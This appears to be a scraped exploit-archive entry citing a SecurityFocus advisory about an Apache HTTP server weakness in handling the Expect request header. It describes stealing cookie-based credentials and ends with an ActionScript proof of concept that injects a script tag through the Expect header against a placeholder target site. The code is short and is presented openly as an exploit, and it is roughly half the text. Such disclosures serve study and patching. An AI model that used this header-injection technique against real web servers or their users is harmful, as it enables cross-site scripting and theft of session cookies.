10 lines
No EOL
411 B
Text
10 lines
No EOL
411 B
Text
source: http://www.securityfocus.com/bid/19661/info
|
|
|
|
Apache HTTP server is prone to a security weakness related to HTTP request headers.
|
|
|
|
An attacker may exploit this issue to steal cookie-based authentication credentials and launch other attacks.
|
|
|
|
var req:LoadVars=new LoadVars();
|
|
req.addRequestHeader("Expect",
|
|
"<script>alert('gotcha!')</script>");
|
|
req.send("http://www.target.site/","_blank","GET"); |